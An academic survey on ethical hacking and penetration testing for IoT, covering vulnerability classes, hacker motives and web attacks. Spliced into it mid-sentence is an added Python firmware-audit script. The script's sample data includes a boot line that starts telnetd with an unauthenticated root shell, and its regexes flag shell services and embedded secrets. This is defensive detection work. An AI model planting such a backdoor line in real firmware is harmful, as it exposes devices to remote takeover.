Internet of Things and Cyber-Physical Systems 3 (2023) 280–308

Contents lists available at ScienceDirect

Internet of Things and Cyber-Physical Systems

journal homepage: www.keaipublishing.com/en/journals/internet-of-things-and-cyber-physical-systems

Ethical hacking for IoT: Security issues, challenges, solutions and recommendations

Jean-Paul A. Yaacoub a, Hassan N. Noura a, Ola Salman b,*, Ali Chehab b
a Univ. Bourgogne Franche-Comte (UBFC), FEMTO-ST Institute, CNRS, Belfort, France
b American University of Beirut, Department of Electrical and Computer Engineering, Lebanon

ARTICLE INFO

Keywords: Internet-of-things (IoT); IoT ethical hacking; IoT penetration testing; Internet of ethical hacking things (IoEHT); IoT cyber-security

ABSTRACT

In recent years, attacks against various Internet-of-Things systems, networks, servers, devices, and applications witnessed a sharp increase, especially with the presence of 35.82 billion IoT devices since 2021; a number that could reach up to 75.44 billion by 2025. As a result, security-related attacks against the IoT domain are expected to increase further and their impact risks to seriously affect the underlying IoT systems, networks, devices, and applications. The adoption of standard security (counter) measures is not always effective, especially with the presence of resource-constrained IoT devices. Hence, there is a need to conduct penetration testing at the level of IoT systems. However, the main issue is the fact that IoT consists of a large variety of IoT devices, firmware, hardware, software, application/web-servers, networks, and communication protocols. Therefore, to reduce the effect of these attacks on IoT systems, periodic penetration testing and ethical hacking simulations are highly recommended at different levels (end-devices, infrastructure, and users) for IoT, and can be considered as a suitable solution. Therefore, the focus of this paper is to explain, analyze and assess both technical and non-technical aspects of security vulnerabilities within IoT systems via ethical hacking methods and tools. This would offer practical security solutions that can be adopted based on the assessed risks. This process can be considered as a simulated attack(s) with the goal of identifying any exploitable vulnerability or/and a security gap in any IoT entity (end devices, gateway, or servers) or firmware.

1. Introduction

Due to the pervasive nature of IoT systems in our daily lives and our constant ongoing reliance on them, the protection of IoT, although critical, is not that efficient due to the poor or absent security measures for such a tremendous number of devices (75.44 billion by 2025, compared to 15.41 billion in 2015) [1], most of which are resource-constrained [2].

Malicious attackers are exploiting the existing IoT vulnerabilities and security gaps [3], especially those caused by third parties [4], which are due to poorly and hastily configured IoT devices, gateways, servers and networks, thus rendering the applications prone to cyber-physical attacks. This paper presents the concepts of ethical hacking, penetration testing and vulnerability assessment in the context of IoT, and discusses the different types of security vulnerabilities and attacks that could be led against IoT components, along with their impact in terms of the essential security services, mainly confidentiality, integrity, availability, and authentication. Moreover, the lack of training and awareness among employees and IT staff is also problematic, especially with the advanced techniques of social engineering. Thus, a framework is presented, from the users’ perspective, based on the main IoT domains.

In general, periodic and effective penetration testing and ethical hacking are mandatory. This can be achieved by evaluating the levels of security/safety against known vulnerabilities and threats, and consequently attacks, via vulnerability assessment, foot-printing, and risk evaluation. This work also highlights the importance of using machine learning solutions to build automated security measures for IoT systems for early detection of any possible vulnerability, and consequently, to avoid the corresponding attacks.

The main objective of this work is to highlight the importance of ethical hacking in performing and conducting penetration testing on IoT systems against a variety of cyber attacks [5]. This helps with the evaluation of the levels of security and immunity of a given IoT entity against known and unknown threats, through assessment and mitigation, and thus increases the levels of awareness, safety and security.

* Corresponding author.
E-mail address: [email protected] (O. Salman).

https://doi.org/10.1016/j.iotcps.2023.04.002
Received 29 December 2022; Received in revised form 1 April 2023; Accepted 7 April 2023
Available online 25 April 2023
2667-3452/© 2023 The Authors. Published by Elsevier B.V. on behalf of KeAi Communications Co., Ltd. This is an open access article under the CC BY license (http://creativecommons.org/licenses/by/4.0/).
J.-P.A. Yaacoub et al. Internet of Things and Cyber-Physical Systems 3 (2023) 280–308

1.1. Related work

Our paper expands the already presented work which discusses the importance of ethical hacking [6,7] and penetration testing [8,9] in both a general and a generic manner. Moreover, recent studies also analysed the digital forensics and anti-forensics concepts for IoT systems and components, which are presented, described, and analysed in Refs. [10,11], but with little or no information concerning ethical hacking, nor its relation with the IoT. In addition to what is presented, this paper studies and analyses the motivations of ethical hackers after identifying and classifying them, to supplement the work done in Refs. [12,13], to identify the main IoT vulnerabilities and consequently the attacks [14] that can be detected, avoided and mitigated through simulated ethical hacking attacks as part of penetration testing, and to suggest suitable security solutions and modern countermeasures. Moreover, this paper assesses the main IoT vulnerabilities and specifies IoT-related risks and how to mitigate them, while analyzing different approaches from different authors. Unlike the presented work in Ref. [15], which analyses the current cyber-security certification schemes, our work focuses on the main security threats, attacks, and issues that can affect the IoT domain from an ethical hacking perspective. Ref. [16] presented IoT-related security attacks that can be mitigated using Machine Learning (ML) methods. However, this work rather relies on the adoption of the ethical hacking concept, where ML is one of the main security solutions. Moreover, Ref. [17] discussed security-related challenges and threat sources in IoT applications. Additionally, this work includes discussing security-related issues against IoT servers, devices, systems, and applications alike. Ref. [18] presented an analysis of IoT security from 2016 to 2018, its trends, and open issues. However, this work rather focuses on current and recent issues that surround the IoT domain instead, especially from a cyber-security viewpoint. Ref. [19] presented a study on the state-of-the-art IoT security threats, vulnerabilities, and possible attacks while presenting possible solutions for improving the IoT security architecture. In addition to the presented work, our paper further expands this work, while also discussing real-case attacks and zero-day exploits, as well as the proper security measures and counter-measures that are or should be adopted to avoid similar attack cases. To the best of our knowledge, ethical hacking for IoT systems is only partially described, with no in-depth discussion nor a close linkage with IoT systems. Therefore, there is a need for a work that discusses the possible implementation of ethical hacking in several IoT key parts. Unlike previous surveys, this paper covers the application of ethical hacking in a variety of IoT fields, especially medical [5], cyber-physical [20], long-range [21] and power-line communications [22], as well as robotics [23,24].

1.2. Contribution

In this paper, a new holistic and analytical viewpoint is presented to offer a better understanding of how ethical hacking and penetration testing can be linked and applied to IoT systems, mainly through a vulnerability assessment. In fact, the importance of this work is that it focuses on covering an even broader range of IoT vulnerabilities, challenges, threats, and consequently attacks, while analyzing their presented security solutions based on all the targeted IoT components, which are listed in Fig. 6.

Thus, the contributions of this paper can be summarised as follows:

• Methodical Way: of classifying and analyzing IoT hackers based on their motives and gains in a more detailed and specific way.
• Analytical Study: of how to assess IoT vulnerabilities in terms of IoT-related risks.
• Analysis: of the most known IoT attacks, their structure, and how to mitigate them.
• Detailed Understanding: of how penetration testing is linked to ethical hackers, and how ethical hackers conduct their penetration testing in the IoT domain, while presenting different approaches from different authors.
• Evaluation: of how penetration testing is used to evaluate the security and protection levels in IoT against different possible potential attacks.
• Security & Safety Procedures: presented in a suitable way that maintains a secure environment before, during and after an IoT incident.
• Presentation and Analysis: of vulnerabilities based on each component of an IoT entity.

1.3. Organisation

This paper is divided into ten sections aside from the introduction and is presented as follows (see Fig. 1): in section 2, the IoT background and overview are presented, including IoT systems, applications, vulnerabilities via penetration testing, in addition to the identification of hackers including their motives and gains. In section 3, cyber-attacks against different IoT fields are presented, including their types and activities. Real-case events, vulnerability exploits and assessment against IoT systems are presented in section 4. In section 5, the ethical hacking domain is presented in terms of IoT, including its life-cycle, tools, challenges and issues. In section 6, penetration testing is further expanded in terms of IoT, including its testing tools, knowledge types, testing appliance and existing solutions. IoT security and safety procedures are presented in section 7, especially in terms of IT security policy and incident response. The lessons learnt are presented in section 8, while future research directions, suggestions and recommendations are presented in section 9 and section 10, respectively. In section 11, we conclude our work.

2. IoT: background & overview

The remarkable rise of IoT devices and domains requires significant innovation that improves the wireless range, overall performance, ease of use, efficiency, and interoperability, to solve key issues related to traffic and transportation, energy, and waste management without affecting the resource/power budget. In fact, IoT is based on smart equipped devices with embedded technologies that allow them to either automatically or selectively collect information from IoT servers and databases before aggregating them to connect and communicate with other users’ end-devices via device-to-device communications using sensor technology and actuators [25]. As a result, IoT 2.0 may as well become the new replacement for traditional IoT by becoming the ”Intelligence of Things” [26].

In this section, the necessary background to further explain IoT systems, in addition to the processes of identification of IoT hackers, is introduced. It also highlights their motives and gains through their performed cyber-activity in parallel with the adopted cyber-attack structure. Finally, a suitable framework for IoT will be presented. However, before starting, it is important to define two main concepts, ”ethical hacking” and ”penetration testing”, to explain the difference and avoid confusing them with each other [27]. Ethical hacking is more flexible in simulating (cyber-physical) attack methods and approaches (i.e., phishing, brute force, social engineering, etc.), while allowing a thorough assessment. Ethical hackers offer recommendations about best-practice security solutions to adopt against security gaps. Penetration testing primarily focuses on the system weaknesses [28], allowing targeted tests to be performed on a specific IoT component (i.e. device, mobile, desktop, iPad, etc.). Even though limited in its testing range, pen-testing offers a higher accuracy in detecting and exposing these flaws before addressing them [29]. In other words, ethical hacking relies on adopting a variety of simulated attacks in realistic scenarios via hacking techniques to uncover security flaws and vulnerabilities, verify the IoT system’s security, and secure any possible gaps. On the other hand, penetration testing, being one aspect of ethical hacking, focuses more on verifying both the safety and security of the IoT’s defense systems [30,31]. Next, we describe IoT networks, the known IoT attacks, and in Fig. 3,


Fig. 1. Visual Structure of this survey paper.

we summarize the concepts of ethical hacking, and how they could be applied within IoT domains.

2.1. IoT systems

As part of its enormous growth, the IoT test architecture is set to become more advanced, standardized, and universally applicable in the near future with multi-technology convergence [32]. As a result, embedded IoT systems, applications, and devices will become more prone to ongoing persistent challenges, and ethical hackers are in a constant race to capture the ever-growing threats, and to identify the main exploitable vulnerabilities that surround them in order to present suitable security solutions. Table 1 summarizes the most frequently used IoT tools. As shown in Fig. 2, an IoT network consists of devices that are connected to a data center (or application servers) through a gateway, such as the case of LoRa end-devices [21] that are connected via wireless channels to several gateways.

Currently, the ethical hacking domain is being extensively adopted in IoT systems, applications, devices, mobile devices, servers, and networks to search, scan, detect, and investigate IoT-related vulnerabilities and security gaps. Thus, the introduction of an ethical hacking process to be integrated into IoT would lead to the Internet of Ethical Hacking Things (IoEHT), or Ethical Hacking for IoT (EHIoT).

2.2. IoT applications

The adoption of ethical hacking in IoT systems and applications is increasing to cover all IoT fields including, but not limited to, Medical IoT [5], Industrial IoT (IIoT), Internet of Cyber-Physical Things (ICPoT), Internet of Powerlines Things (IoPT) [22], Internet of Agricultural Things (IoAT), Internet of Communication Things (IoCT) (i.e. LoRaWAN) [21], and Internet of Military Things (IoMT)/Internet of Battlefield Things (IoBT) [33,34]. This also includes the Internet of Robotics Things (IoRT) [23,24], especially modular robots and Unmanned/Autonomous Aerial, Ground, Surface, Underwater and Underground vehicles [35,36].

More specifically, ethical hacking for IoT was used to evaluate the levels of safety and security of IoT systems, servers, applications, end-devices, gateways, and application servers to present the best security practices that are neither computationally expensive nor energy exhaustive, especially for limited and resource-constrained IoT devices [5].

In IoT-related military, law enforcement and police fields, there are increasing demands to apply ethical hacking to ensure that systems, servers, and devices are protected from any cyber or/and physical attacks, especially attacks linked to (cyber) sabotage [37], espionage [38], spying, cyberwarfare [39], terrorism [40,41], web defacement and (distributed) denial of service.

Fig. 3 shows a set of possible applications that benefit from IoT, as briefly described below:

• Medical Systems: healthcare systems have become digitized with the ability to achieve remote monitoring and diagnosis, along with the ability to perform tele-medical operations and implant smart medical devices. As a result, the IoMT domain became prone to a variety of cyber-attacks (mostly ransomware and phishing) [42] that target the patients’ privacy, mostly targeting medical records and interrupting/intercepting operations [43]. Hence, it is very important to adopt the Ethical Hacking for IoT approach to detect security and vulnerability gaps to reduce the likelihood of these events occurring [44].
• Industrial Systems: especially cyber-physical systems such as smart factories, smart grids, power grids, smart enterprises and smart cities, which rely on constant data transmission between these IoT distributed systems, made them prone to a variety of cyber-attacks (i.e. worms) mostly linked to sabotage and espionage acts, such as the case of targeting the US grids, as well as the ongoing cyber-war between Israel and Iran [45,46], Russia and Ukraine [47,48], including attacks against Ukrainian nuclear facilities [49,50]. This made Industrial Control Systems (ICS) and other smart devices, systems, and servers the most vulnerable to these attacks. Hence the reliance on the EHIoT concept is highly recommended, not only to detect possible security gaps but also to enhance them and ensure a higher reactive response by the First Incident Responders Team (FIRT).
• Traffic Control Systems: especially AI-based Intelligent Traffic Control Systems with the ability to offer early detection, prediction, and prevention of any network traffic congestion or road closures [51] to prevent accidents and avoid traffic problems via a constant collection of traffic data [52] are also prone to attacks. These attacks can take control of all traffic signs or can even jam, control or redirect traffic, or even intercept and manipulate transmitted data. Hence, the EHIoT should be adopted to discover these vulnerabilities and security gaps to prevent such fatal accidents from possibly occurring.
• Agriculture Systems: as agriculture and farming are being fully integrated into IoT, especially Agriculture 4.0 to ensure smart farming, crop monitoring and watering, and other tasks, they became more prone and susceptible to cyber-attacks [53]. These attacks are mostly related to security concerns that affect the data that is being transmitted, which would reduce its accuracy and hinder agricultural/farming efforts. This is achieved by targeting IoT supply

Table 1
Most prominent IoT pen testing tools.

Name | Type | Description
Binwalk | Firmware extraction tool | Analyses an IoT device’s firmware, retrieves file system contents
Fiddler | Open-source web application | Used to debug, manipulate/reuse HTTP requests, allows users to track
Firmwalker | Bash script | Scans extracted files from IoT firmware
Maltego (CE) | Open-source intelligence & forensics | Real-time analysis via information gathering using open-source intelligence
SAINT | Static taint analysis program | Protects cloud-facing IoT from XSS, CSRF and SQLi, tracks the information flow
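Table 1 lists Binwalk (to unpack a firmware image) and Firmwalker (to scan the unpacked files). The following Python script is an added example, not code from the paper nor from either tool: it performs a Firmwalker-style review of an already-unpacked firmware tree, flagging embedded private keys, accounts with an empty password field, hard-coded credentials and clear-text legacy services started at boot, and labels each finding with one of the vulnerability classes the paper uses in Section 2.3 (poor data encryption, identification and authentication failures, weak access controls, system misconfigurations). The directory layout and file contents created by build_sample_root() are constructed for this demonstration and do not come from any real device.

```python
"""Firmwalker-style audit of an extracted IoT firmware file system.

Added example: this is not code from the paper, nor from the Binwalk or
Firmwalker projects listed in Table 1. It assumes the firmware image has
already been unpacked (e.g. with Binwalk) into a directory tree; the layout
and contents produced by build_sample_root() are constructed sample data.
"""
import re
import tempfile
from dataclasses import dataclass
from pathlib import Path

# PEM header of any private key type shipped inside the image.
PRIVATE_KEY_RE = re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----")
# Assignment of a secret in a shell/config file, e.g. ADMIN_PASS=admin1234.
CREDENTIAL_RE = re.compile(
    r"^\s*(?:export\s+)?(?:PASSWORD|PASSWD|ADMIN_PASS|password|passwd)\s*=\s*\S+",
    re.MULTILINE,
)
# Clear-text remote-access services that should not start on a modern device.
LEGACY_SERVICE_RE = re.compile(r"\b(telnetd|rshd|tftpd)\b")


@dataclass(frozen=True)
class Finding:
    category: str  # one of the vulnerability classes the paper lists in Section 2.3
    path: str      # path relative to the firmware root
    detail: str


def _is_boot_script(path: Path) -> bool:
    """True for init scripts and inittab-style files executed at boot."""
    return "init.d" in path.parts or path.name in ("inittab", "rcS")


def audit_firmware_root(root: Path) -> list[Finding]:
    """Walk an unpacked firmware tree and report security weaknesses."""
    findings: list[Finding] = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = str(path.relative_to(root))
        text = path.read_text(errors="ignore")
        # 1. Private keys baked into the image are shared by every unit shipped.
        if PRIVATE_KEY_RE.search(text):
            findings.append(Finding("poor data encryption", rel, "embedded private key"))
        # 2. An empty password field in /etc/shadow or /etc/passwd means
        #    the account logs in with no password at all.
        if path.parent.name == "etc" and path.name in ("shadow", "passwd"):
            for line in text.splitlines():
                fields = line.split(":")
                if len(fields) > 1 and fields[1] == "":
                    findings.append(Finding(
                        "identification and authentication failures", rel,
                        f"account '{fields[0]}' has an empty password field"))
        # 3. Credentials hard-coded in scripts or configuration files.
        if CREDENTIAL_RE.search(text):
            findings.append(Finding("weak access controls", rel, "hard-coded credential"))
        # 4. Legacy clear-text services launched from the boot scripts.
        if _is_boot_script(path):
            for service in sorted(set(LEGACY_SERVICE_RE.findall(text))):
                findings.append(Finding(
                    "system misconfigurations", rel, f"{service} started at boot"))
    return findings


def summarize(findings: list[Finding]) -> dict[str, int]:
    """Count findings per vulnerability class."""
    counts: dict[str, int] = {}
    for f in findings:
        counts[f.category] = counts.get(f.category, 0) + 1
    return counts


def build_sample_root(base: Path) -> Path:
    """Create a small fictitious unpacked firmware tree (constructed sample data)."""
    root = base / "squashfs-root"
    (root / "etc" / "init.d").mkdir(parents=True)
    (root / "etc" / "ssl").mkdir()
    (root / "www").mkdir()
    # root has an empty hash field; admin has a (fake) md5crypt hash.
    (root / "etc" / "shadow").write_text(
        "root::19000:0:99999:7:::\n"
        "admin:$1$saltsalt$fakehashfakehashfakehash:19000:0:99999:7:::\n")
    (root / "etc" / "ssl" / "server.key").write_text(
        "-----BEGIN RSA PRIVATE KEY-----\nMIIE-constructed-not-a-real-key\n"
        "-----END RSA PRIVATE KEY-----\n")
    (root / "etc" / "init.d" / "rcS").write_text(
        "#!/bin/sh\n/usr/sbin/telnetd -l /bin/sh &\n/usr/sbin/httpd -h /www\n")
    (root / "www" / "cgi_env.sh").write_text(
        "#!/bin/sh\nADMIN_PASS=admin1234\nexport ADMIN_PASS\n")
    (root / "www" / "index.html").write_text("<html><body>Device UI</body></html>\n")
    return root


def run_demo() -> list[Finding]:
    """Build the sample tree in a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_firmware_root(build_sample_root(Path(tmp)))


if __name__ == "__main__":
    for finding in run_demo():
        print(f"[{finding.category}] {finding.path}: {finding.detail}")
    print(summarize(run_demo()))
```

Run the script directly to print the four findings for the constructed tree; point audit_firmware_root() at a real Binwalk extraction directory (typically named squashfs-root) to review your own device image. The checks are deliberately simple pattern matches and are a starting point for a firmware review, not a replacement for manual analysis of what they report.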


Fig. 2. An Example of an Internet-of-Things System with n IoT Devices, k Aggregation Nodes & m Servers. Aggregator nodes might not exist, and IoT devices can connect to gateways directly.

Fig. 3. Ethical Hacking in Different IoT-related domains.

chains, data, networks, and applications [54]. As a result, EHIoT should be adopted and employed to detect any vulnerability or security gap to patch and update it, as such attacks can seriously affect the food chain.
• Banking and Finance Systems: most financial institutions are now integrated into the IoT domain, with online transactions being performed on a daily continuous basis, as well as other operations such as the e-commerce and e-banking ecosystem, net-banking, Unified Payments Interface (UPI), and cloud computing. As a result, they became prone to several cyber-attacks (i.e. the DDoS attack against Ukraine including PrivatBank and Oschadbank in February 2022) [55,56], security threats and vulnerability exploits targeting customers, important documents, financial details, classified and sensitive banking information [57]. As a result, ethical hacking should be employed to detect any device, network, or system breaches, while detecting keyloggers on devices and skimmers on ATM booths. This can help protect and safeguard IoT banking sectors, especially devices, systems, servers, and applications, reduce security breaches, as well as detect, act and react against any possible security breach or event (i.e. attack).
• IoT Robotic Systems: robotics, which are now being integrated into all of the IoT-related domains such as medical, agriculture, industry, banking, search and rescue, military (combat/reconnaissance), law enforcement, etc., evolved to include modular robotic types [58], as well as swarm robotics [59]. This includes Unmanned Ground Vehicles (UGV), Unmanned Underground Vehicles (UUgV),


Unmanned Surface Vehicles (USV), Unmanned Underwater Vehicles (UUwV), and Unmanned Aerial Vehicles (UAVs) [23,24]. This left them prone to a variety of IoT robotic-related attacks, especially targeting the network and communication aspects, as well as systems, gateways, and devices. Hence, the EHIoT aspect should also be adopted and applied to detect any vulnerability and security gap to prevent any future security breaches.
• Military Installation Systems: as military installations/embassies are being more and more digitized and AI-based, they became targets [60,61] for cyber-attacks by their opponents, especially with the employment of (jamming/signal) Electronic Measures (EM) and Electronic Counter-Measures (ECM). These installations also became a target for cyber-terrorists and hacktivists [62,63]. As a result, cyber-armies were established with cyber-units to perform defense, offense, or/and counter-offense duties. Hence, the concept of ethical hacking is extensively being employed, especially under the concept of game theories.
• Police and Law Enforcement Systems: as all forms of electronic records became digitized, sensitive police information and records related to criminals, victims, convicts and police officers are also prone to cyber-attacks and can be leaked mostly through exploits and ransomware attacks, such as the case of the Washington, D.C., Metropolitan Police Department ransomware attack in May 2021 [64].

In the following, we explain the background of hackers and ethical hacking and its corresponding classification in detail, along with how it is closely linked to the IoT domain including its devices, systems, servers, applications, etc.

2.3. IoT vulnerabilities: penetration test

In IoT systems, including digital systems, robotic systems, cyber-physical systems, power-lines, medical and agricultural systems, etc., attackers will use existing vulnerability tools (or develop their own) to detect (via searching and scanning) vulnerabilities that can be useful to plan and conduct an internal/external attack. Such vulnerabilities can exploit IoT applications via weak access controls, malicious third parties, cryptographic failures, injection exploits, security gaps, insecure design, data integrity failures, outdated components, identification and authentication failures [65]; IoT devices via system misconfigurations, unpatched software, malicious insider threats, zero-day exploits, poor data encryption, old anti-virus, weak vulnerability detection and lack of cyber-security Vulnerability Assessment [66]; IoT servers via injection flaws, weak authentication, missing function level Access Control, exposure of sensitive data, security misconfiguration, system configuration and directory exploits [67]; and IoT networks (which can be hardware-based, software-based, and human-based) via unauthorised access, denial of service, malicious code/data injections, insider threats and privilege escalation [68,69]. Therefore, the main challenge is to not only identify these vulnerabilities and security gaps but to also fix them. This task can be very challenging, since it requires defining new specialised countermeasures and security measures to preserve IoT systems, devices, gateways, application/network servers, and architecture. The task’s complexity is due to the fact that IoT systems consist of a different set of technologies, software, hardware, middleware, and applications, as well as resource-constrained devices. For this reason, the technical skills for any Internet of Things - Penetration Testing (IoT-PT) should be high and diverse to cover various IoT systems’ components including computers, networks, cloud/fog, mobiles, etc., where new majors and domains need to be introduced to fill the gap and leave IoT-PTs capable of specializing in one IoT-related domain, rather than covering a wider general aspect.

Unfortunately, all threat types come from the same sources that aim to target IoT systems and compromise devices, gateways, servers, applications, and components, to launch internal/external attacks against other IoT-related systems (indirect attack) or against their internal systems (i.e. software or application). This is done by detecting (via reconnaissance and scanning) the vulnerabilities or/and security gaps, followed by exploitation.

Given the fact that 1) IoT systems rely on typical Operating Systems (OS), 2) use the Internet for interconnection and to connect to either application servers at the edge or in the cloud, and 3) mobile devices are used to access IoT systems, IoT penetration testing (PT) involves computer PT, network PT, and mobile PT.

2.4. Identifying hackers

Before proceeding any further, it is important to categorise hackers in terms of their aim, objectives and goals, to try and build a bigger picture about each classification and try to understand and figure out what their main targets against an IoT domain are.

• State/Nation Sponsored: This type of hacker is employed by a given government with open and even unlimited resources available at their disposal, in addition to the employment and use of very advanced sophisticated tools. This helps them exploit any security gap or vulnerability to gain confidential information about another rival government to stay in the lead [70]. Moreover, this also allows them to achieve further goals based on influencing a government election, like when Russia was accused of interfering in the US elections in 2016 [71].
• Hacktivists: Hacktivism usually occurs when a hacktivist mainly hacks for either a social or political agenda, mainly to protest against a government’s actions or military actions [72,73]. They are based on an anonymous or even a covert group which can either be local, regional, or/and international. This type of hacker relies on targeting and hacking IoT systems, including a government, a military website, or/and an organisation in order to grab some media attention to propagandize their own objectives and goals [74]. Their favorite attack types are (but are not limited to) Denial of Service and Web Defacement.
• Cryptojackers: are also called cryptocurrency mining hackers, whose aim is to exploit network vulnerabilities to steal end devices’ resources to mine cryptocurrencies after exploiting their weaknesses and vulnerabilities [75]. This is usually achieved by spreading a spyware (i.e. Trojan, Worm or Virus) across the Web that downloads automatically on the victim’s device and works quietly without the victim’s knowledge.
• Gaming Hackers: have their full focus on the online gaming virtual world, especially with the presence of scammers [76]. Their aim is also to hack the game and exploit its bugs, or to even target online streamers, famous players, or professional players and hack their accounts or gaming channels. This can either be for personal reasons or sent by rival competitors to stream snipe them or have their accounts banned or deactivated. AI-based bots can also be used as a means to hack/hijack players’ gaming accounts or to launch DDoS/DoS attacks to bring the game servers down [77].
• Cyber-Spy: Hackers or even whistle-blowers might also be employed by a given national or international intelligence agency in order to perform cyber-spying, cyber-sabotage, cyber-espionage, cyber-warfare [78,79] or cyber-intelligence [80,81] task(s) [82,83] against a given government, military or terrorist target(s). It is mainly done to conduct cyber-espionage operation(s), or a covert information gathering to retrieve essential information about their targets for further exploitation and further cyber-attacks (i.e. Espionage/Reconnaissance) [84]. In fact, they can also be employed by rival organisations to conduct industrial cyber-espionage for industrial data theft.
• Cyber-Heist: Cyber-heist is usually achieved when the attackers try to steal as much money as possible from a large number of known online bank accounts, in the least amount of time, mainly targeting the Internet of Financial Things (IoFT). Such attacks are usually achieved


either through hacking or even phishing, where they are cashed out in a single unique operation, targeting either the customer of a given bank, or the bank itself [85]. A prime example of that is the Bangladesh bank cyber-heist [86], and the cyber capabilities of North Korea [87].
• Script Kiddie: exclusively rely on copying codes and scripts to perform malicious code injection (i.e. SQLi) or modification, mostly. Moreover, Script Kiddies rely on ready-made programs in order to use them. Script kiddies also focus on the use of DoS and DDoS attacks to hit the availability of a given IoT system, website, or device [88].
• Cyber-Criminals: Hackers can also commit cyber-crimes, hence they are known as cyber-criminals [89] when they try to perform and commit their attacks online. All of the crimes mentioned above, along with other crimes, can be classified as cyber-criminal acts, and sometimes, cyber-terrorist acts [90].
• Cyber-Insurgents/Terrorists: Cyber-terrorists also rely on the internet [74] in order to lead and perform online attacks [91,92] to cause serious economic implications [93] against IoT systems, networks, servers and devices alike. Such cyber-attacks are mainly based on information leakage, web-defacement [94], or even Denial of Service (DoS) and Distributed Denial of Service (DDoS) attacks. This is all due to the fact that terrorists' knowledge is very limited in the cyber-world. However, it is also evolving using different methods [95], techniques [96] and tactics [97], adopted by different groups [98]. Prime examples of that are the Houthis [99], Hamas (green hats) [100,101] and the Palestinian Islamic Jihad (PIJ) [102] cyber capabilities [103,104], Al-Qaeda's cyber wing [105], Al-Nusra Front [105] and ISIS's cyber-caliphate, cyber-recruiting [106,107], cyber-Jihad and e-terrorism [108,109].
• Suicide Hackers: Suicide hackers are hackers who aim at hacking for a given purpose in order to achieve their intended objectives and goals without taking into consideration the impact of their action [110,111].

2.5. Hackers' motives

It is also important to understand the motives [112] behind IoT attacks, and to shed some light on hackers' backgrounds, and the reasons for launching their cyber-attacks against IoT systems.

• Political: Political motives are usually based on targeting governments' official websites either through DoS and DDoS attacks or through web defacement. This is done to register a protesting statement against the government's new law, or a new agreement on military action against another government. Such moves can usually be led by anti-war hackers [113] as a cyber-protest and demonstration.
• Patriotic: or national motives are based on using hacking as a method to register an official protest as part of condemning a given act against a given country, hence relying on hacking as a form of "cyber-protest". In fact, it looks very similar to hacktivism, except that the main difference is based on a given national group targeting a given country or an individual. The best known example occurred when Chinese hackers sent a series of DDoS attacks against American and NATO websites as a form of protest against the bombing of the Chinese embassy in Belgrade, in 1999 [114,115].
• Religious: Religious motives are mostly based on extremist views or/and radicalism (i.e. takfir), and are another reason for committing a cyber-crime in the name of a certain religion. Such attacks were formerly led by Al-Qaeda [116] and now ISIS/ISIL [117,118], more specifically, the ISIS cyber-wing (cyber-caliphate), to either recruit online, spread propaganda, or communicate with their sleeping cells in western countries to perform terrorist attacks mainly across Africa and the Middle East [119,120].
• Racism: Many hacking attacks were also led by racist racial groups including the KKK and Neo-Nazis, QAnon [121], Black Panthers [122], ANTIFA along with many other racist groups [123], based on hacking with the purpose of ensuring a racial supremacy, hate preaching [124], or trolling [125]. It can also be classified as a different form of terrorism led and performed in order to target other minorities by spreading fear and terror, online [126].

2.6. Hacking gains

This section classifies hacking gains into either commercial gains, financial gains, personal gains, or even political ones. In fact, it depends on the motives of the intended hacking group, their background, and ability to wage cyber-attacks against the IoT domain.

• Economic: Hackers do rely on targeting IoT's economy for multiple reasons. Such reasons depend on their intended objectives and aims. In fact, they can be employed by rival organisations to target another competitive organisation and reveal its business secrets and trades. Moreover, they might also be employed to cripple the economy of a given organisation by hitting its online available services [127]. Furthermore, it seems like cyber crimes are responsible for around $12 million per business annually [128].
• Financial: Financial gains are at the top of hackers' priorities. Moreover, they are a crucial source of money theft and money laundering, on which hackers heavily rely as an illegal source of income and funding. The global cost of a serious cyber-attack can lead to $120 billion of losses. According to PwC's Global State of Information Security Survey 2018 [129], the total cost of a financial incident was 857 000 euros, a cost that is high especially for IoT systems.
• Personal: Personal gains are another aspect, especially when a rogue/unsatisfied employee (or whistle-blower) is kicked out of a given organisation. In fact, their aim shifts towards taking revenge against their own organisation. Such a move is done by selling secrets to rival organisations, or disclosing the organisation's sensitive information [130]. The main aim and goal of this move is to either damage their reputation, scam and blackmail, or disclose their personal information.
• Political: Political gains are also of a high priority for a given political party, which can operate within the same country, or even against a foreign country's political law. Therefore, hacking can be the new weapon to affect voting polls, or even election polls. In fact, Russia was accused of interfering with the US elections in 2016 [71]. Such a move is aimed at influencing another country through a political alliance achieved by paid propaganda and media, which plays a crucial and essential role in affecting the public's opinion.

3. Targeted IoT cyber-attacks

Targeted attacks are presented according to their aims against IoT systems: network, firmware, users/personnel, device or application. First, it is important to describe the cyber-attacks' structure.

3.1. Cyber-attack types

Cyber-attack structures eventually differ depending on the attack type, as well as the motives, knowledge, experience and skills of the attacker. Moreover, the attack structure also depends on the available resources at the hackers' disposal. As a result, the cyber-attack structure is divided and presented as follows: coordinated, distributed, organised, focused and precise. This is summarised in Fig. 4. In fact, cyber-attacks against IoT are not limited to one aspect and classification since they target a variety of IoT systems within the different IoT domains. In fact, there are endless classifications with countless attacks. The aim of this paper is to present the most common

Fig. 4. Attacks against IoT-related domains.

known types of attack that hackers and criminals use, while also presenting suitable security measures to mitigate and overcome them.

3.1.1. Web attacks

Web attacks are primarily classified as attacks that target websites, or use websites as a launching platform for their remote cyber-attacks. Among these attacks, their main types are presented as follows:

• Cookies Hijack: the attack steals the magic cookie that authenticates a user to the remote server. HTTP cookies are also used across multi-website sessions, and are easy to steal from the victim's devices [131].
• CoAP-based Attacks: the Constrained Application Protocol (CoAP) is an application-layer, specialised web-based transfer protocol used with IoT constrained nodes and constrained networks to enable constrained devices (i.e. sensors) [132] to join IoT networks with low bandwidth and low availability, thus offering lower latency and power consumption [133]. In fact, CoAP is a simplified version of HTTP for IoT or Wireless Sensor Networks (WSNs). Despite its advantages, CoAP is prone to a variety of attacks such as Cross-Protocol, Hijacking, DoS, Man-In-The-Middle, Replay, Relay, Sniffing and Spoofing attacks [134]. A solution to overcome several CoAP-based attacks was the presentation of a secure authentication and access control scheme for CoAP-based IoT by Obaidat et al. in Ref. [135].
